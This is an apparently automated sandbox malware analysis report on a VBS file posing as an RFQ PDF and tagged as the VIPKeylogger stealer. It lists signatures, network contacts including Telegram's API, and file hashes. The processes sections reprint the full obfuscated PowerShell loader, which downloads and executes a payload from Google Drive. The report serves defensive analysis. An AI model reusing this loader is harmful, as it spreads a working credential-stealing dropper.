Malware Analysis Report

2024-11-15 07:58

Sample ID 241024-hftvwazbkp
Target RFQ_64182MR_PDF.R00.vbs
SHA256 ee763e48dad8e005251345990a572ccbf15929e76c5fa68ab3d1fc80ef7e5286
Tags
vipkeylogger discovery execution keylogger stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ee763e48dad8e005251345990a572ccbf15929e76c5fa68ab3d1fc80ef7e5286

Threat Level: Known bad

The file RFQ_64182MR_PDF.R00.vbs was found to be: Known bad.

Malicious Activity Summary

vipkeylogger discovery execution keylogger stealer

VIPKeylogger

Blocklisted process makes network request

Checks computer location settings

Command and Scripting Interpreter: PowerShell

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Program crash

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-24 06:41

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-24 06:41

Reported

2024-10-24 07:40

Platform

win7-20240903-en

Max time kernel

35s

Max time network

126s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ_64182MR_PDF.R00.vbs"

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ_64182MR_PDF.R00.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe cOKinoeT K nkOfloodc StbnoReserl Behe F lig=Overr Betle[ ArienN kvrERe tetLicen.Konios .tesEIcineCS.mmeURedupr stopIGom,hTHusfayTi sfPCountRR gisOArnawtDioptOTegnscBrnehoErgaslPaasatRe onyInddapCockce onpo] Pl t:Disco:S ridtgeorglEfterSKon,a1.ingu2 Ata ');$Delggelses=$Lithophilous[0];$Fitted=(Franarrendes 'S dde$Lisbeg Keralstac OAs albNorlaaOr inL imse:DocerNG,udeeUnfaiOFlameP Sladr Udl,EMiljpNqua re anka=DipsonStolpE rojeW Stil-photoOSukkebDescrjLys aeWheywCNedn thove .oncrsCheckyKov,rsPericT.reteEE.onoMCorro.SubauNAresfEPyro tSethe.RaddyW,rhneegramsbHov rCAxin LDomiciSpidsEPe,olN sup,T era ');Forbindingers ($Fitted);Forbindingers (Franarrendes 'Scirr$Fa csNCircueForsooKaliupSpaltrM ulde SkatnTeleoe Pans. OsmoHAgendeGifteaSuprad UdfreDissir herisDiabo[Sce e$DefmrRJaw meskuregUnc lnF uoreJingktTranseKubisgWoodsnAgrope sem tKvili]Forti=Badmi$yaccrMHovedoV,ndsdAvi.uuBisselFuldfaTildarHornhiFremstExpone verdtFingee obbinSem.o8 urbo5Taktr ');$Behoovings=Franarrendes ',orde$M.tchN HylieAmireoSinknpBifolrAi,boeRap fnWarsteEnosi.pai,cDTokyooQui cwTmme nSma fl EnteoL ucoaNarkod LnkoFHectoiSelvhlHav aeRandd( Quan$ Ad,pDbudcye DisplUntragLabang Sna eLovovlNapoosDe pneTub rs Deli,Satyr$BymllB etalFasc iRullenBrn,hdSkud.iOecussdagplmKrigs)S.rpu ';$Blindism=$Decarbonylated;Forbindingers (Franarrendes 'Heron$ skrogSeptiL.remeO orgeb Gr.vAAnt.tLAporo:BrnephAssafaTepotnRef eRAnde EDeeskjdykkeEFor lRForvaNEneanEGrisbsSvamp=Freet(Spi dTLaereeUlidesIndefTnybru-Maa ePFuscoaP.rret DeadHKjepl Eks.l$ MacrbHansalSmuttIOutsmnSyst.dEpisiIAntepsRecutMFestd) Bann ');while (!$hanrejernes) {Forbindingers (Franarrendes 'Salpa$St erg ygnilWindooHerbobLektua uretlDisqu:CelebP BrndiB,gatgTrakegDrabsiIchthn.aadlgIia,a4 My t4Kultu=Foraa$ ronvtHieror S yeuS ksueNybeg ') ;Forbindingers $Behoovings;Forbindingers (Franarrendes 'PapliSBr,ckTudtryaBremsrLivreTTerma-BegynSCyn cLRoshaeennuyEOphthPd bbe E.fre4Finda ');Forbindingers (Franarrendes 'Rolli$Diatogpalatlvelo.OS rmubSommeaBlgeblBeliq: Ste hPlanlALarvenRnnebR.jeneE BiggjUrtileAmtssRDe abN rhveEAcerbSPopul=,lens(SnuskTLseliE,ercuSGrandt ngul-Aftr,pGaffea aadfTGalenH Akkl Spros$ OptrBMskinLDrhamIGnomoNFantodUnlowiUnempsTermomTalpa)Obl,t ') ;Forbindingers (Franarrendes 'Chlor$Go pegForekL L,jeOA,eyaBChaseA Ska.LDespo: RepabFoderAA pensAndentX,nthINumdaNUbetvg BeskSVandp= Ravn$St rvgKatteLBrunjoSubplBRe oma ndkl S.ek:MautdKAutaeuTillagB jublpr paEProbasSpid + Ble +Numau%Pha d$StbelLPap.gIpha nT Idioh OpreoSlumrPFruerHBlundI oviel VegeOSkoleUunjokSI ter.Subadc ippeOSkrivUVr tjNKommetUdsty ') ;$Delggelses=$Lithophilous[$Bastings];}$Gospels=307653;$Flapr2=30753;Forbindingers (Franarrendes ' Trin$MuntiGB nkoL SlagoS mspBPerleA EolilDiss :khmerbFototLStockNgemalD Aga,eAfvastRabar Faks=Ski,n RadikGAegy.eDiskutE rre-Skrifcnin tOGyngeN PromtPyurie,mokenWatert Prog bloms$ InteBPeriolAmalgiConduNForkidKodesIGrammSAu orm .egi ');Forbindingers (Franarrendes ',leva$BlokogMeterlLovbuovigerb,pildaC lmilPinac:OddfeFFilteeTerebuDichodMilieaskankloutlilSemicyUndis Khub=Ga,in Macar[CheerSSelvbydecors Korrt supeeHydrom Cove.WooshC .andoS,bbrn RajavGu dsePortlr TnkstEncla]Sprng:Grupp:BraceFUngrarBrorso Brd mGen,nBResulajewedsStandeSt aa6,dsun4SkulpSDexamtDeagorKviksi ZappnForl gLumba(,rain$S ldyBLactal aflgnUdflud,urroeK llitHa.vl)sjofl ');Forbindingers (Franarrendes 'Bortv$E icaGraadslKuedeOOverpBWeirdASuperlUdh n:KnurrbPu.dlyG vltCAu olY Ov rKInforlDel.ae DehyRKlumrnExterE M.la Blues=Biref Popli[gid.nsD speYSwaggs etekTW eelEBlotcMMesot.Har etembate.redex R.lat Long.Sa chE BaanN G,oacBe stOBra,yDFst.nIFriz nC.scag,ncon] Ambr:Diako:r,annASammeSdengacF rarI Eksei Cond.preadGLofteESeksetAn ensApiartWaurar Te.hIRev,lN BiobgBrand(Goute$V nstf AuriEsexo.UPlastDTekstaImplilDerayLK ordYResee)Lagen ');Forbindingers (Franarrendes 'Unre $SubfoGE ektL,elenoMunkeb.urriA AyyuL .urs:N nocBUnsmoaSedatJ Ung.E udb,r ugtiePhot.sPyga.=D ndr$ P.ocbCalymYGuldfCF,rniyTinelK,rimaLSarcoequincrPalaeNFrgemERkebi.Y.elsSDekolU Florbc.resSTeks tStraaRSkadeIStorsN,lixiGBrack(Homos$Ke atGVers ODowcoS Hu pP incoEMaa eLNodesSfornu,Nepal$ drifFFondalKaramAAf elp InelROv rl2In,iv) Juve ');Forbindingers $Bajeres;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe cOKinoeT K nkOfloodc StbnoReserl Behe F lig=Overr Betle[ ArienN kvrERe tetLicen.Konios .tesEIcineCS.mmeURedupr stopIGom,hTHusfayTi sfPCountRR gisOArnawtDioptOTegnscBrnehoErgaslPaasatRe onyInddapCockce onpo] Pl t:Disco:S ridtgeorglEfterSKon,a1.ingu2 Ata ');$Delggelses=$Lithophilous[0];$Fitted=(Franarrendes 'S dde$Lisbeg Keralstac OAs albNorlaaOr inL imse:DocerNG,udeeUnfaiOFlameP Sladr Udl,EMiljpNqua re anka=DipsonStolpE rojeW Stil-photoOSukkebDescrjLys aeWheywCNedn thove .oncrsCheckyKov,rsPericT.reteEE.onoMCorro.SubauNAresfEPyro tSethe.RaddyW,rhneegramsbHov rCAxin LDomiciSpidsEPe,olN sup,T era ');Forbindingers ($Fitted);Forbindingers (Franarrendes 'Scirr$Fa csNCircueForsooKaliupSpaltrM ulde SkatnTeleoe Pans. OsmoHAgendeGifteaSuprad UdfreDissir herisDiabo[Sce e$DefmrRJaw meskuregUnc lnF uoreJingktTranseKubisgWoodsnAgrope sem tKvili]Forti=Badmi$yaccrMHovedoV,ndsdAvi.uuBisselFuldfaTildarHornhiFremstExpone verdtFingee obbinSem.o8 urbo5Taktr ');$Behoovings=Franarrendes ',orde$M.tchN HylieAmireoSinknpBifolrAi,boeRap fnWarsteEnosi.pai,cDTokyooQui cwTmme nSma fl EnteoL ucoaNarkod LnkoFHectoiSelvhlHav aeRandd( Quan$ Ad,pDbudcye DisplUntragLabang Sna eLovovlNapoosDe pneTub rs Deli,Satyr$BymllB etalFasc iRullenBrn,hdSkud.iOecussdagplmKrigs)S.rpu ';$Blindism=$Decarbonylated;Forbindingers (Franarrendes 'Heron$ skrogSeptiL.remeO orgeb Gr.vAAnt.tLAporo:BrnephAssafaTepotnRef eRAnde EDeeskjdykkeEFor lRForvaNEneanEGrisbsSvamp=Freet(Spi dTLaereeUlidesIndefTnybru-Maa ePFuscoaP.rret DeadHKjepl Eks.l$ MacrbHansalSmuttIOutsmnSyst.dEpisiIAntepsRecutMFestd) Bann ');while (!$hanrejernes) {Forbindingers (Franarrendes 'Salpa$St erg ygnilWindooHerbobLektua uretlDisqu:CelebP BrndiB,gatgTrakegDrabsiIchthn.aadlgIia,a4 My t4Kultu=Foraa$ ronvtHieror S yeuS ksueNybeg ') ;Forbindingers $Behoovings;Forbindingers (Franarrendes 'PapliSBr,ckTudtryaBremsrLivreTTerma-BegynSCyn cLRoshaeennuyEOphthPd bbe E.fre4Finda ');Forbindingers (Franarrendes 'Rolli$Diatogpalatlvelo.OS rmubSommeaBlgeblBeliq: Ste hPlanlALarvenRnnebR.jeneE BiggjUrtileAmtssRDe abN rhveEAcerbSPopul=,lens(SnuskTLseliE,ercuSGrandt ngul-Aftr,pGaffea aadfTGalenH Akkl Spros$ OptrBMskinLDrhamIGnomoNFantodUnlowiUnempsTermomTalpa)Obl,t ') ;Forbindingers (Franarrendes 'Chlor$Go pegForekL L,jeOA,eyaBChaseA Ska.LDespo: RepabFoderAA pensAndentX,nthINumdaNUbetvg BeskSVandp= Ravn$St rvgKatteLBrunjoSubplBRe oma ndkl S.ek:MautdKAutaeuTillagB jublpr paEProbasSpid + Ble +Numau%Pha d$StbelLPap.gIpha nT Idioh OpreoSlumrPFruerHBlundI oviel VegeOSkoleUunjokSI ter.Subadc ippeOSkrivUVr tjNKommetUdsty ') ;$Delggelses=$Lithophilous[$Bastings];}$Gospels=307653;$Flapr2=30753;Forbindingers (Franarrendes ' Trin$MuntiGB nkoL SlagoS mspBPerleA EolilDiss :khmerbFototLStockNgemalD Aga,eAfvastRabar Faks=Ski,n RadikGAegy.eDiskutE rre-Skrifcnin tOGyngeN PromtPyurie,mokenWatert Prog bloms$ InteBPeriolAmalgiConduNForkidKodesIGrammSAu orm .egi ');Forbindingers (Franarrendes ',leva$BlokogMeterlLovbuovigerb,pildaC lmilPinac:OddfeFFilteeTerebuDichodMilieaskankloutlilSemicyUndis Khub=Ga,in Macar[CheerSSelvbydecors Korrt supeeHydrom Cove.WooshC .andoS,bbrn RajavGu dsePortlr TnkstEncla]Sprng:Grupp:BraceFUngrarBrorso Brd mGen,nBResulajewedsStandeSt aa6,dsun4SkulpSDexamtDeagorKviksi ZappnForl gLumba(,rain$S ldyBLactal aflgnUdflud,urroeK llitHa.vl)sjofl ');Forbindingers (Franarrendes 'Bortv$E icaGraadslKuedeOOverpBWeirdASuperlUdh n:KnurrbPu.dlyG vltCAu olY Ov rKInforlDel.ae DehyRKlumrnExterE M.la Blues=Biref Popli[gid.nsD speYSwaggs etekTW eelEBlotcMMesot.Har etembate.redex R.lat Long.Sa chE BaanN G,oacBe stOBra,yDFst.nIFriz nC.scag,ncon] Ambr:Diako:r,annASammeSdengacF rarI Eksei Cond.preadGLofteESeksetAn ensApiartWaurar Te.hIRev,lN BiobgBrand(Goute$V nstf AuriEsexo.UPlastDTekstaImplilDerayLK ordYResee)Lagen ');Forbindingers (Franarrendes 'Unre $SubfoGE ektL,elenoMunkeb.urriA AyyuL .urs:N nocBUnsmoaSedatJ Ung.E udb,r ugtiePhot.sPyga.=D ndr$ P.ocbCalymYGuldfCF,rniyTinelK,rimaLSarcoequincrPalaeNFrgemERkebi.Y.elsSDekolU Florbc.resSTeks tStraaRSkadeIStorsN,lixiGBrack(Homos$Ke atGVers ODowcoS Hu pP incoEMaa eLNodesSfornu,Nepal$ drifFFondalKaramAAf elp InelROv rl2In,iv) Juve ');Forbindingers $Bajeres;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.178.3:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.178.3:80 o.pki.goog tcp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 checkip.dyndns.org udp
US 193.122.130.0:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 104.21.67.152:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.18.190.80:80 crl.microsoft.com tcp

Files

memory/2896-4-0x000007FEF513E000-0x000007FEF513F000-memory.dmp

memory/2896-5-0x000000001B700000-0x000000001B9E2000-memory.dmp

memory/2896-6-0x0000000001E60000-0x0000000001E68000-memory.dmp

memory/2896-7-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

memory/2896-8-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

memory/2896-9-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

memory/2896-11-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

memory/2896-10-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

memory/2896-13-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

memory/2896-14-0x000007FEF513E000-0x000007FEF513F000-memory.dmp

memory/2896-16-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZEWQANB74JC5JAIXK3PO.temp

MD5 d0a1b6f8c101524394750e499ab57ab4
SHA1 d76539a75d684d909358551bc0166f9fd0dc8e4a
SHA256 e8b790bea3d144883ec5b0fdf38a397e81a303fca748a97c6a776c0525210a4c
SHA512 8c2f3e896d6f423cfb102fe985b2eeaf2986f67a52830b59ac7f73414acb20b2e16e122ca306f9956af8d597cf5e6e6ad229c43d346e3dd781cb9138ae2dc78c

C:\Users\Admin\AppData\Roaming\Platyhelminthic195.End

MD5 6771cd798c1df9b5eddc60071dfc6e15
SHA1 65e923600e1c2604d90a481d257dc99c23fbf1dd
SHA256 0849655061e0ce5f5f2633e43ef08a62a3482cf9f15baf24fbd6b25f8abad95f
SHA512 cf0013a56ef6ab5fb48ddd80d3e94b879b6890586a5e11313c66b35c352111d3fff2d21a9f9e42a4163cf4e05419610a696e5d428a32eacb45d6f4103b9085ee

memory/2144-20-0x0000000006780000-0x000000000B708000-memory.dmp

memory/2200-42-0x0000000000740000-0x00000000017A2000-memory.dmp

memory/2200-43-0x0000000000740000-0x00000000017A2000-memory.dmp

memory/2200-44-0x0000000000740000-0x0000000000788000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-24 06:41

Reported

2024-10-24 08:19

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ_64182MR_PDF.R00.vbs"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\msiexec.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ_64182MR_PDF.R00.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc 